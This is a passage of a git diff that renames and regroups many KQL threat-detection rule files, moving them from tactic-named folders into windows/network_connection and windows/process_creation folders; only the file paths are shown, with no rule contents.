KQL/rules/windows/network_connection/remote_access_tool_anydesk_incoming_connection.kql diff --git a/KQL/rules/Defense Evasion/rundll32_internet_connection.kql b/KQL/rules/windows/network_connection/rundll32_internet_connection.kql similarity index 100% rename from KQL/rules/Defense Evasion/rundll32_internet_connection.kql rename to KQL/rules/windows/network_connection/rundll32_internet_connection.kql diff --git a/KQL/rules/Execution/silenttrinity_stager_msbuild_activity.kql b/KQL/rules/windows/network_connection/silenttrinity_stager_msbuild_activity.kql similarity index 100% rename from KQL/rules/Execution/silenttrinity_stager_msbuild_activity.kql rename to KQL/rules/windows/network_connection/silenttrinity_stager_msbuild_activity.kql diff --git a/KQL/rules/Command and Control/suspicious_dropbox_api_usage.kql b/KQL/rules/windows/network_connection/suspicious_dropbox_api_usage.kql similarity index 100% rename from KQL/rules/Command and Control/suspicious_dropbox_api_usage.kql rename to KQL/rules/windows/network_connection/suspicious_dropbox_api_usage.kql diff --git a/KQL/rules/Defense Evasion/suspicious_network_connection_binary_no_commandline.kql b/KQL/rules/windows/network_connection/suspicious_network_connection_binary_no_commandline.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_network_connection_binary_no_commandline.kql rename to KQL/rules/windows/network_connection/suspicious_network_connection_binary_no_commandline.kql diff --git a/KQL/rules/Discovery/suspicious_network_connection_to_ip_lookup_service_apis.kql b/KQL/rules/windows/network_connection/suspicious_network_connection_to_ip_lookup_service_apis.kql similarity index 100% rename from KQL/rules/Discovery/suspicious_network_connection_to_ip_lookup_service_apis.kql rename to KQL/rules/windows/network_connection/suspicious_network_connection_to_ip_lookup_service_apis.kql diff --git a/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_google_api.kql b/KQL/rules/windows/network_connection/suspicious_non_browser_network_communication_with_google_api.kql similarity index 100% rename from KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_google_api.kql rename to KQL/rules/windows/network_connection/suspicious_non_browser_network_communication_with_google_api.kql diff --git a/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_telegram_api.kql b/KQL/rules/windows/network_connection/suspicious_non_browser_network_communication_with_telegram_api.kql similarity index 100% rename from KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_telegram_api.kql rename to KQL/rules/windows/network_connection/suspicious_non_browser_network_communication_with_telegram_api.kql diff --git a/KQL/rules/Exfiltration/suspicious_outbound_smtp_connections.kql b/KQL/rules/windows/network_connection/suspicious_outbound_smtp_connections.kql similarity index 100% rename from KQL/rules/Exfiltration/suspicious_outbound_smtp_connections.kql rename to KQL/rules/windows/network_connection/suspicious_outbound_smtp_connections.kql diff --git a/KQL/rules/Defense Evasion/suspicious_wordpad_outbound_connections.kql b/KQL/rules/windows/network_connection/suspicious_wordpad_outbound_connections.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_wordpad_outbound_connections.kql rename to KQL/rules/windows/network_connection/suspicious_wordpad_outbound_connections.kql diff --git a/KQL/rules/Discovery/uncommon_connection_to_active_directory_web_services.kql b/KQL/rules/windows/network_connection/uncommon_connection_to_active_directory_web_services.kql similarity index 100% rename from KQL/rules/Discovery/uncommon_connection_to_active_directory_web_services.kql rename to KQL/rules/windows/network_connection/uncommon_connection_to_active_directory_web_services.kql diff --git a/KQL/rules/Command and Control/uncommon_network_connection_initiated_by_certutil_exe.kql b/KQL/rules/windows/network_connection/uncommon_network_connection_initiated_by_certutil_exe.kql similarity index 100% rename from KQL/rules/Command and Control/uncommon_network_connection_initiated_by_certutil_exe.kql rename to KQL/rules/windows/network_connection/uncommon_network_connection_initiated_by_certutil_exe.kql diff --git a/KQL/rules/Defense Evasion/uncommon_outbound_kerberos_connection.kql b/KQL/rules/windows/network_connection/uncommon_outbound_kerberos_connection.kql similarity index 100% rename from KQL/rules/Defense Evasion/uncommon_outbound_kerberos_connection.kql rename to KQL/rules/windows/network_connection/uncommon_outbound_kerberos_connection.kql diff --git a/KQL/rules/Collection/7zip_compressing_dump_files.kql b/KQL/rules/windows/process_creation/7zip_compressing_dump_files.kql similarity index 100% rename from KQL/rules/Collection/7zip_compressing_dump_files.kql rename to KQL/rules/windows/process_creation/7zip_compressing_dump_files.kql diff --git a/KQL/rules/Execution/aadinternals_powershell_cmdlets_execution_proccesscreation.kql b/KQL/rules/windows/process_creation/aadinternals_powershell_cmdlets_execution_proccesscreation.kql similarity index 100% rename from KQL/rules/Execution/aadinternals_powershell_cmdlets_execution_proccesscreation.kql rename to KQL/rules/windows/process_creation/aadinternals_powershell_cmdlets_execution_proccesscreation.kql diff --git a/KQL/rules/Persistence/abuse_of_service_permissions_to_hide_services_via_set_service.kql b/KQL/rules/windows/process_creation/abuse_of_service_permissions_to_hide_services_via_set_service.kql similarity index 100% rename from KQL/rules/Persistence/abuse_of_service_permissions_to_hide_services_via_set_service.kql rename to KQL/rules/windows/process_creation/abuse_of_service_permissions_to_hide_services_via_set_service.kql diff --git a/KQL/rules/Defense Evasion/abused_debug_privilege_by_arbitrary_parent_processes.kql b/KQL/rules/windows/process_creation/abused_debug_privilege_by_arbitrary_parent_processes.kql similarity index 100% rename from KQL/rules/Defense Evasion/abused_debug_privilege_by_arbitrary_parent_processes.kql rename to KQL/rules/windows/process_creation/abused_debug_privilege_by_arbitrary_parent_processes.kql diff --git a/KQL/rules/Defense Evasion/abusing_print_executable.kql b/KQL/rules/windows/process_creation/abusing_print_executable.kql similarity index 100% rename from KQL/rules/Defense Evasion/abusing_print_executable.kql rename to KQL/rules/windows/process_creation/abusing_print_executable.kql diff --git a/KQL/rules/Discovery/active_directory_database_snapshot_via_adexplorer.kql b/KQL/rules/windows/process_creation/active_directory_database_snapshot_via_adexplorer.kql similarity index 100% rename from KQL/rules/Discovery/active_directory_database_snapshot_via_adexplorer.kql rename to KQL/rules/windows/process_creation/active_directory_database_snapshot_via_adexplorer.kql diff --git a/KQL/rules/Exfiltration/active_directory_structure_export_via_csvde_exe.kql b/KQL/rules/windows/process_creation/active_directory_structure_export_via_csvde_exe.kql similarity index 100% rename from KQL/rules/Exfiltration/active_directory_structure_export_via_csvde_exe.kql rename to KQL/rules/windows/process_creation/active_directory_structure_export_via_csvde_exe.kql diff --git a/KQL/rules/Exfiltration/active_directory_structure_export_via_ldifde_exe.kql b/KQL/rules/windows/process_creation/active_directory_structure_export_via_ldifde_exe.kql similarity index 100% rename from KQL/rules/Exfiltration/active_directory_structure_export_via_ldifde_exe.kql rename to KQL/rules/windows/process_creation/active_directory_structure_export_via_ldifde_exe.kql diff --git a/KQL/rules/Defense Evasion/add_insecure_download_source_to_winget.kql b/KQL/rules/windows/process_creation/add_insecure_download_source_to_winget.kql similarity index 100% rename from KQL/rules/Defense Evasion/add_insecure_download_source_to_winget.kql rename to KQL/rules/windows/process_creation/add_insecure_download_source_to_winget.kql diff --git a/KQL/rules/Defense Evasion/add_new_download_source_to_winget.kql b/KQL/rules/windows/process_creation/add_new_download_source_to_winget.kql similarity index 100% rename from KQL/rules/Defense Evasion/add_new_download_source_to_winget.kql rename to KQL/rules/windows/process_creation/add_new_download_source_to_winget.kql diff --git a/KQL/rules/Defense Evasion/add_potential_suspicious_new_download_source_to_winget.kql b/KQL/rules/windows/process_creation/add_potential_suspicious_new_download_source_to_winget.kql similarity index 100% rename from KQL/rules/Defense Evasion/add_potential_suspicious_new_download_source_to_winget.kql rename to KQL/rules/windows/process_creation/add_potential_suspicious_new_download_source_to_winget.kql diff --git a/KQL/rules/Defense Evasion/add_safeboot_keys_via_reg_utility.kql b/KQL/rules/windows/process_creation/add_safeboot_keys_via_reg_utility.kql similarity index 100% rename from KQL/rules/Defense Evasion/add_safeboot_keys_via_reg_utility.kql rename to KQL/rules/windows/process_creation/add_safeboot_keys_via_reg_utility.kql diff --git a/KQL/rules/Execution/add_windows_capability_via_powershell_cmdlet.kql b/KQL/rules/windows/process_creation/add_windows_capability_via_powershell_cmdlet.kql similarity index 100% rename from KQL/rules/Execution/add_windows_capability_via_powershell_cmdlet.kql rename to KQL/rules/windows/process_creation/add_windows_capability_via_powershell_cmdlet.kql diff --git a/KQL/rules/Defense Evasion/addinutil_exe_execution_from_uncommon_directory.kql b/KQL/rules/windows/process_creation/addinutil_exe_execution_from_uncommon_directory.kql similarity index 100% rename from KQL/rules/Defense Evasion/addinutil_exe_execution_from_uncommon_directory.kql rename to KQL/rules/windows/process_creation/addinutil_exe_execution_from_uncommon_directory.kql diff --git a/KQL/rules/Defense Evasion/agentexecutor_powershell_execution.kql b/KQL/rules/windows/process_creation/agentexecutor_powershell_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/agentexecutor_powershell_execution.kql rename to KQL/rules/windows/process_creation/agentexecutor_powershell_execution.kql diff --git a/KQL/rules/Impact/all_backups_deleted_via_wbadmin_exe.kql b/KQL/rules/windows/process_creation/all_backups_deleted_via_wbadmin_exe.kql similarity index 100% rename from KQL/rules/Impact/all_backups_deleted_via_wbadmin_exe.kql rename to KQL/rules/windows/process_creation/all_backups_deleted_via_wbadmin_exe.kql diff --git a/KQL/rules/Privilege Escalation/allow_service_access_using_security_descriptor_tampering_via_sc_exe.kql b/KQL/rules/windows/process_creation/allow_service_access_using_security_descriptor_tampering_via_sc_exe.kql similarity index 100% rename from KQL/rules/Privilege Escalation/allow_service_access_using_security_descriptor_tampering_via_sc_exe.kql rename to KQL/rules/windows/process_creation/allow_service_access_using_security_descriptor_tampering_via_sc_exe.kql diff --git a/KQL/rules/Defense Evasion/always_install_elevated_msi_spawned_cmd_and_powershell.kql b/KQL/rules/windows/process_creation/always_install_elevated_msi_spawned_cmd_and_powershell.kql similarity index 100% rename from KQL/rules/Defense Evasion/always_install_elevated_msi_spawned_cmd_and_powershell.kql rename to KQL/rules/windows/process_creation/always_install_elevated_msi_spawned_cmd_and_powershell.kql diff --git a/KQL/rules/Defense Evasion/always_install_elevated_windows_installer.kql b/KQL/rules/windows/process_creation/always_install_elevated_windows_installer.kql similarity index 100% rename from KQL/rules/Defense Evasion/always_install_elevated_windows_installer.kql rename to KQL/rules/windows/process_creation/always_install_elevated_windows_installer.kql diff --git a/KQL/rules/Execution/application_removed_via_wmic_exe.kql b/KQL/rules/windows/process_creation/application_removed_via_wmic_exe.kql similarity index 100% rename from KQL/rules/Execution/application_removed_via_wmic_exe.kql rename to KQL/rules/windows/process_creation/application_removed_via_wmic_exe.kql diff --git a/KQL/rules/Execution/application_terminated_via_wmic_exe.kql b/KQL/rules/windows/process_creation/application_terminated_via_wmic_exe.kql similarity index 100% rename from KQL/rules/Execution/application_terminated_via_wmic_exe.kql rename to KQL/rules/windows/process_creation/application_terminated_via_wmic_exe.kql diff --git a/KQL/rules/Execution/arbitrary_binary_execution_using_gup_utility.kql b/KQL/rules/windows/process_creation/arbitrary_binary_execution_using_gup_utility.kql similarity index 100% rename from KQL/rules/Execution/arbitrary_binary_execution_using_gup_utility.kql rename to KQL/rules/windows/process_creation/arbitrary_binary_execution_using_gup_utility.kql diff --git a/KQL/rules/Defense Evasion/arbitrary_dll_or_csproj_code_execution_via_dotnet_exe.kql b/KQL/rules/windows/process_creation/arbitrary_dll_or_csproj_code_execution_via_dotnet_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/arbitrary_dll_or_csproj_code_execution_via_dotnet_exe.kql rename to KQL/rules/windows/process_creation/arbitrary_dll_or_csproj_code_execution_via_dotnet_exe.kql diff --git a/KQL/rules/Exfiltration/arbitrary_file_download_via_configsecuritypolicy_exe.kql b/KQL/rules/windows/process_creation/arbitrary_file_download_via_configsecuritypolicy_exe.kql similarity index 100% rename from KQL/rules/Exfiltration/arbitrary_file_download_via_configsecuritypolicy_exe.kql rename to KQL/rules/windows/process_creation/arbitrary_file_download_via_configsecuritypolicy_exe.kql diff --git a/KQL/rules/Command and Control/arbitrary_file_download_via_gfxdownloadwrapper_exe.kql b/KQL/rules/windows/process_creation/arbitrary_file_download_via_gfxdownloadwrapper_exe.kql similarity index 100% rename from KQL/rules/Command and Control/arbitrary_file_download_via_gfxdownloadwrapper_exe.kql rename to KQL/rules/windows/process_creation/arbitrary_file_download_via_gfxdownloadwrapper_exe.kql diff --git a/KQL/rules/Defense Evasion/arbitrary_file_download_via_imewdbld_exe.kql b/KQL/rules/windows/process_creation/arbitrary_file_download_via_imewdbld_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/arbitrary_file_download_via_imewdbld_exe.kql rename to KQL/rules/windows/process_creation/arbitrary_file_download_via_imewdbld_exe.kql diff --git a/KQL/rules/Defense Evasion/arbitrary_file_download_via_msedge_proxy_exe.kql b/KQL/rules/windows/process_creation/arbitrary_file_download_via_msedge_proxy_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/arbitrary_file_download_via_msedge_proxy_exe.kql rename to KQL/rules/windows/process_creation/arbitrary_file_download_via_msedge_proxy_exe.kql diff --git a/KQL/rules/Defense Evasion/arbitrary_file_download_via_msohtmed_exe.kql b/KQL/rules/windows/process_creation/arbitrary_file_download_via_msohtmed_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/arbitrary_file_download_via_msohtmed_exe.kql rename to KQL/rules/windows/process_creation/arbitrary_file_download_via_msohtmed_exe.kql diff --git a/KQL/rules/Defense Evasion/arbitrary_file_download_via_mspub_exe.kql b/KQL/rules/windows/process_creation/arbitrary_file_download_via_mspub_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/arbitrary_file_download_via_mspub_exe.kql rename to KQL/rules/windows/process_creation/arbitrary_file_download_via_mspub_exe.kql diff --git a/KQL/rules/Defense Evasion/arbitrary_file_download_via_presentationhost_exe.kql b/KQL/rules/windows/process_creation/arbitrary_file_download_via_presentationhost_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/arbitrary_file_download_via_presentationhost_exe.kql rename to KQL/rules/windows/process_creation/arbitrary_file_download_via_presentationhost_exe.kql diff --git a/KQL/rules/Defense Evasion/arbitrary_file_download_via_squirrel_exe.kql b/KQL/rules/windows/process_creation/arbitrary_file_download_via_squirrel_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/arbitrary_file_download_via_squirrel_exe.kql rename to KQL/rules/windows/process_creation/arbitrary_file_download_via_squirrel_exe.kql diff --git a/KQL/rules/Execution/arbitrary_msi_download_via_devinit_exe.kql b/KQL/rules/windows/process_creation/arbitrary_msi_download_via_devinit_exe.kql similarity index 100% rename from KQL/rules/Execution/arbitrary_msi_download_via_devinit_exe.kql rename to KQL/rules/windows/process_creation/arbitrary_msi_download_via_devinit_exe.kql diff --git a/KQL/rules/Execution/arbitrary_shell_command_execution_via_settingcontent_ms.kql b/KQL/rules/windows/process_creation/arbitrary_shell_command_execution_via_settingcontent_ms.kql similarity index 100% rename from KQL/rules/Execution/arbitrary_shell_command_execution_via_settingcontent_ms.kql rename to KQL/rules/windows/process_creation/arbitrary_shell_command_execution_via_settingcontent_ms.kql diff --git a/KQL/rules/Defense Evasion/aspnetcompiler_execution.kql b/KQL/rules/windows/process_creation/aspnetcompiler_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/aspnetcompiler_execution.kql rename to KQL/rules/windows/process_creation/aspnetcompiler_execution.kql diff --git a/KQL/rules/Defense Evasion/assembly_loading_via_cl_loadassembly_ps1.kql b/KQL/rules/windows/process_creation/assembly_loading_via_cl_loadassembly_ps1.kql similarity index 100% rename from KQL/rules/Defense Evasion/assembly_loading_via_cl_loadassembly_ps1.kql rename to KQL/rules/windows/process_creation/assembly_loading_via_cl_loadassembly_ps1.kql diff --git a/KQL/rules/Collection/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql b/KQL/rules/windows/process_creation/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql similarity index 100% rename from KQL/rules/Collection/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql rename to KQL/rules/windows/process_creation/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql diff --git a/KQL/rules/Collection/audio_capture_via_powershell.kql b/KQL/rules/windows/process_creation/audio_capture_via_powershell.kql similarity index 100% rename from KQL/rules/Collection/audio_capture_via_powershell.kql rename to KQL/rules/windows/process_creation/audio_capture_via_powershell.kql diff --git a/KQL/rules/Collection/audio_capture_via_soundrecorder.kql b/KQL/rules/windows/process_creation/audio_capture_via_soundrecorder.kql similarity index 100% rename from KQL/rules/Collection/audio_capture_via_soundrecorder.kql rename to KQL/rules/windows/process_creation/audio_capture_via_soundrecorder.kql diff --git a/KQL/rules/Defense Evasion/audit_policy_tampering_via_auditpol.kql b/KQL/rules/windows/process_creation/audit_policy_tampering_via_auditpol.kql similarity index 100% rename from KQL/rules/Defense Evasion/audit_policy_tampering_via_auditpol.kql rename to KQL/rules/windows/process_creation/audit_policy_tampering_via_auditpol.kql diff --git a/KQL/rules/Defense Evasion/audit_policy_tampering_via_nt_resource_kit_auditpol.kql b/KQL/rules/windows/process_creation/audit_policy_tampering_via_nt_resource_kit_auditpol.kql similarity index 100% rename from KQL/rules/Defense Evasion/audit_policy_tampering_via_nt_resource_kit_auditpol.kql rename to KQL/rules/windows/process_creation/audit_policy_tampering_via_nt_resource_kit_auditpol.kql diff --git a/KQL/rules/Collection/automated_collection_command_prompt.kql b/KQL/rules/windows/process_creation/automated_collection_command_prompt.kql similarity index 100% rename from KQL/rules/Collection/automated_collection_command_prompt.kql rename to KQL/rules/windows/process_creation/automated_collection_command_prompt.kql diff --git a/KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl.kql b/KQL/rules/windows/process_creation/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl.kql similarity index 100% rename from KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl.kql rename to KQL/rules/windows/process_creation/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl.kql diff --git a/KQL/rules/Defense Evasion/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql b/KQL/rules/windows/process_creation/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql similarity index 100% rename from KQL/rules/Defense Evasion/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql rename to KQL/rules/windows/process_creation/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql diff --git a/KQL/rules/Defense Evasion/base64_encoded_powershell_command_detected.kql b/KQL/rules/windows/process_creation/base64_encoded_powershell_command_detected.kql similarity index 100% rename from KQL/rules/Defense Evasion/base64_encoded_powershell_command_detected.kql rename to KQL/rules/windows/process_creation/base64_encoded_powershell_command_detected.kql diff --git a/KQL/rules/Execution/base64_mz_header_in_commandline.kql b/KQL/rules/windows/process_creation/base64_mz_header_in_commandline.kql similarity index 100% rename from KQL/rules/Execution/base64_mz_header_in_commandline.kql rename to KQL/rules/windows/process_creation/base64_mz_header_in_commandline.kql diff --git a/KQL/rules/Execution/binary_proxy_execution_via_dotnet_trace_exe.kql b/KQL/rules/windows/process_creation/binary_proxy_execution_via_dotnet_trace_exe.kql similarity index 100% rename from KQL/rules/Execution/binary_proxy_execution_via_dotnet_trace_exe.kql rename to KQL/rules/windows/process_creation/binary_proxy_execution_via_dotnet_trace_exe.kql diff --git a/KQL/rules/Defense Evasion/bitlockertogo_exe_execution.kql b/KQL/rules/windows/process_creation/bitlockertogo_exe_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/bitlockertogo_exe_execution.kql rename to KQL/rules/windows/process_creation/bitlockertogo_exe_execution.kql diff --git a/KQL/rules/Impact/boot_configuration_tampering_via_bcdedit_exe.kql b/KQL/rules/windows/process_creation/boot_configuration_tampering_via_bcdedit_exe.kql similarity index 100% rename from KQL/rules/Impact/boot_configuration_tampering_via_bcdedit_exe.kql rename to KQL/rules/windows/process_creation/boot_configuration_tampering_via_bcdedit_exe.kql diff --git a/KQL/rules/Defense Evasion/browser_execution_in_headless_mode.kql b/KQL/rules/windows/process_creation/browser_execution_in_headless_mode.kql similarity index 100% rename from KQL/rules/Defense Evasion/browser_execution_in_headless_mode.kql rename to KQL/rules/windows/process_creation/browser_execution_in_headless_mode.kql diff --git a/KQL/rules/Credential Access/browser_started_with_remote_debugging.kql b/KQL/rules/windows/process_creation/browser_started_with_remote_debugging.kql similarity index 100% rename from KQL/rules/Credential Access/browser_started_with_remote_debugging.kql rename to KQL/rules/windows/process_creation/browser_started_with_remote_debugging.kql diff --git a/KQL/rules/Privilege Escalation/bypass_uac_via_cmstp.kql b/KQL/rules/windows/process_creation/bypass_uac_via_cmstp.kql similarity index 100% rename from KQL/rules/Privilege Escalation/bypass_uac_via_cmstp.kql rename to KQL/rules/windows/process_creation/bypass_uac_via_cmstp.kql diff --git a/KQL/rules/Defense Evasion/bypass_uac_via_fodhelper_exe.kql b/KQL/rules/windows/process_creation/bypass_uac_via_fodhelper_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/bypass_uac_via_fodhelper_exe.kql rename to KQL/rules/windows/process_creation/bypass_uac_via_fodhelper_exe.kql diff --git a/KQL/rules/Privilege Escalation/bypass_uac_via_wsreset_exe.kql b/KQL/rules/windows/process_creation/bypass_uac_via_wsreset_exe.kql similarity index 100% rename from KQL/rules/Privilege Escalation/bypass_uac_via_wsreset_exe.kql rename to KQL/rules/windows/process_creation/bypass_uac_via_wsreset_exe.kql diff --git a/KQL/rules/Defense Evasion/c_il_code_compilation_via_ilasm_exe.kql b/KQL/rules/windows/process_creation/c_il_code_compilation_via_ilasm_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/c_il_code_compilation_via_ilasm_exe.kql rename to KQL/rules/windows/process_creation/c_il_code_compilation_via_ilasm_exe.kql diff --git a/KQL/rules/Execution/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql b/KQL/rules/windows/process_creation/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql similarity index 100% rename from KQL/rules/Execution/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql rename to KQL/rules/windows/process_creation/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql diff --git a/KQL/rules/Credential Access/capture_credentials_with_rpcping_exe.kql b/KQL/rules/windows/process_creation/capture_credentials_with_rpcping_exe.kql similarity index 100% rename from KQL/rules/Credential Access/capture_credentials_with_rpcping_exe.kql rename to KQL/rules/windows/process_creation/capture_credentials_with_rpcping_exe.kql diff --git a/KQL/rules/Defense Evasion/certificate_exported_via_certutil_exe.kql b/KQL/rules/windows/process_creation/certificate_exported_via_certutil_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/certificate_exported_via_certutil_exe.kql rename to KQL/rules/windows/process_creation/certificate_exported_via_certutil_exe.kql diff --git a/KQL/rules/Credential Access/certificate_exported_via_powershell.kql b/KQL/rules/windows/process_creation/certificate_exported_via_powershell.kql similarity index 100% rename from KQL/rules/Credential Access/certificate_exported_via_powershell.kql rename to KQL/rules/windows/process_creation/certificate_exported_via_powershell.kql diff --git a/KQL/rules/Privilege Escalation/change_default_file_association_to_executable_via_assoc.kql b/KQL/rules/windows/process_creation/change_default_file_association_to_executable_via_assoc.kql similarity index 100% rename from KQL/rules/Privilege Escalation/change_default_file_association_to_executable_via_assoc.kql rename to KQL/rules/windows/process_creation/change_default_file_association_to_executable_via_assoc.kql diff --git a/KQL/rules/Privilege Escalation/change_default_file_association_via_assoc.kql b/KQL/rules/windows/process_creation/change_default_file_association_via_assoc.kql similarity index 100% rename from KQL/rules/Privilege Escalation/change_default_file_association_via_assoc.kql rename to KQL/rules/windows/process_creation/change_default_file_association_via_assoc.kql diff --git a/KQL/rules/Execution/change_powershell_policies_to_an_insecure_level.kql b/KQL/rules/windows/process_creation/change_powershell_policies_to_an_insecure_level.kql similarity index 100% rename from KQL/rules/Execution/change_powershell_policies_to_an_insecure_level.kql rename to KQL/rules/windows/process_creation/change_powershell_policies_to_an_insecure_level.kql diff --git a/KQL/rules/Privilege Escalation/changing_existing_service_imagepath_value_via_reg_exe.kql b/KQL/rules/windows/process_creation/changing_existing_service_imagepath_value_via_reg_exe.kql similarity index 100% rename from KQL/rules/Privilege Escalation/changing_existing_service_imagepath_value_via_reg_exe.kql rename to KQL/rules/windows/process_creation/changing_existing_service_imagepath_value_via_reg_exe.kql diff --git a/KQL/rules/Persistence/chopper_webshell_process_pattern.kql b/KQL/rules/windows/process_creation/chopper_webshell_process_pattern.kql similarity index 100% rename from KQL/rules/Persistence/chopper_webshell_process_pattern.kql rename to KQL/rules/windows/process_creation/chopper_webshell_process_pattern.kql diff --git a/KQL/rules/Execution/chromium_browser_headless_execution_to_mockbin_like_site.kql b/KQL/rules/windows/process_creation/chromium_browser_headless_execution_to_mockbin_like_site.kql similarity index 100% rename from KQL/rules/Execution/chromium_browser_headless_execution_to_mockbin_like_site.kql rename to KQL/rules/windows/process_creation/chromium_browser_headless_execution_to_mockbin_like_site.kql diff --git a/KQL/rules/Persistence/chromium_browser_instance_executed_with_custom_extension.kql b/KQL/rules/windows/process_creation/chromium_browser_instance_executed_with_custom_extension.kql similarity index 100% rename from KQL/rules/Persistence/chromium_browser_instance_executed_with_custom_extension.kql rename to KQL/rules/windows/process_creation/chromium_browser_instance_executed_with_custom_extension.kql diff --git a/KQL/rules/Command and Control/cloudflared_portable_execution.kql b/KQL/rules/windows/process_creation/cloudflared_portable_execution.kql similarity index 100% rename from KQL/rules/Command and Control/cloudflared_portable_execution.kql rename to KQL/rules/windows/process_creation/cloudflared_portable_execution.kql diff --git a/KQL/rules/Command and Control/cloudflared_quick_tunnel_execution.kql b/KQL/rules/windows/process_creation/cloudflared_quick_tunnel_execution.kql similarity index 100% rename from KQL/rules/Command and Control/cloudflared_quick_tunnel_execution.kql rename to KQL/rules/windows/process_creation/cloudflared_quick_tunnel_execution.kql diff --git a/KQL/rules/Command and Control/cloudflared_tunnel_connections_cleanup.kql b/KQL/rules/windows/process_creation/cloudflared_tunnel_connections_cleanup.kql similarity index 100% rename from KQL/rules/Command and Control/cloudflared_tunnel_connections_cleanup.kql rename to KQL/rules/windows/process_creation/cloudflared_tunnel_connections_cleanup.kql diff --git a/KQL/rules/Command and Control/cloudflared_tunnel_execution.kql b/KQL/rules/windows/process_creation/cloudflared_tunnel_execution.kql similarity index 100% rename from KQL/rules/Command and Control/cloudflared_tunnel_execution.kql rename to KQL/rules/windows/process_creation/cloudflared_tunnel_execution.kql diff --git a/KQL/rules/Execution/cmd_exe_missing_space_characters_execution_anomaly.kql b/KQL/rules/windows/process_creation/cmd_exe_missing_space_characters_execution_anomaly.kql similarity index 100% rename from KQL/rules/Execution/cmd_exe_missing_space_characters_execution_anomaly.kql rename to KQL/rules/windows/process_creation/cmd_exe_missing_space_characters_execution_anomaly.kql diff --git a/KQL/rules/Defense Evasion/cmstp_execution_process_creation.kql b/KQL/rules/windows/process_creation/cmstp_execution_process_creation.kql similarity index 100% rename from KQL/rules/Defense Evasion/cmstp_execution_process_creation.kql rename to KQL/rules/windows/process_creation/cmstp_execution_process_creation.kql diff --git a/KQL/rules/Execution/cmstp_uac_bypass_via_com_object_access.kql b/KQL/rules/windows/process_creation/cmstp_uac_bypass_via_com_object_access.kql similarity index 100% rename from KQL/rules/Execution/cmstp_uac_bypass_via_com_object_access.kql rename to KQL/rules/windows/process_creation/cmstp_uac_bypass_via_com_object_access.kql diff --git a/KQL/rules/Defense Evasion/cobaltstrike_load_by_rundll32.kql b/KQL/rules/windows/process_creation/cobaltstrike_load_by_rundll32.kql similarity index 100% rename from KQL/rules/Defense Evasion/cobaltstrike_load_by_rundll32.kql rename to KQL/rules/windows/process_creation/cobaltstrike_load_by_rundll32.kql diff --git a/KQL/rules/Defense Evasion/code_execution_via_pcwutl_dll.kql b/KQL/rules/windows/process_creation/code_execution_via_pcwutl_dll.kql similarity index 100% rename from KQL/rules/Defense Evasion/code_execution_via_pcwutl_dll.kql rename to KQL/rules/windows/process_creation/code_execution_via_pcwutl_dll.kql diff --git a/KQL/rules/Defense Evasion/codepage_modification_via_mode_com_to_russian_language.kql b/KQL/rules/windows/process_creation/codepage_modification_via_mode_com_to_russian_language.kql similarity index 100% rename from KQL/rules/Defense Evasion/codepage_modification_via_mode_com_to_russian_language.kql rename to KQL/rules/windows/process_creation/codepage_modification_via_mode_com_to_russian_language.kql diff --git a/KQL/rules/Defense Evasion/com_object_execution_via_xwizard_exe.kql b/KQL/rules/windows/process_creation/com_object_execution_via_xwizard_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/com_object_execution_via_xwizard_exe.kql rename to KQL/rules/windows/process_creation/com_object_execution_via_xwizard_exe.kql diff --git a/KQL/rules/Execution/command_line_execution_with_suspicious_url_and_appdata_strings.kql b/KQL/rules/windows/process_creation/command_line_execution_with_suspicious_url_and_appdata_strings.kql similarity index 100% rename from KQL/rules/Execution/command_line_execution_with_suspicious_url_and_appdata_strings.kql rename to KQL/rules/windows/process_creation/command_line_execution_with_suspicious_url_and_appdata_strings.kql diff --git a/KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_7_zip.kql b/KQL/rules/windows/process_creation/compress_data_and_lock_with_password_for_exfiltration_with_7_zip.kql similarity index 100% rename from KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_7_zip.kql rename to KQL/rules/windows/process_creation/compress_data_and_lock_with_password_for_exfiltration_with_7_zip.kql diff --git a/KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_winzip.kql b/KQL/rules/windows/process_creation/compress_data_and_lock_with_password_for_exfiltration_with_winzip.kql similarity index 100% rename from KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_winzip.kql rename to KQL/rules/windows/process_creation/compress_data_and_lock_with_password_for_exfiltration_with_winzip.kql diff --git a/KQL/rules/Collection/compressed_file_creation_via_tar_exe.kql 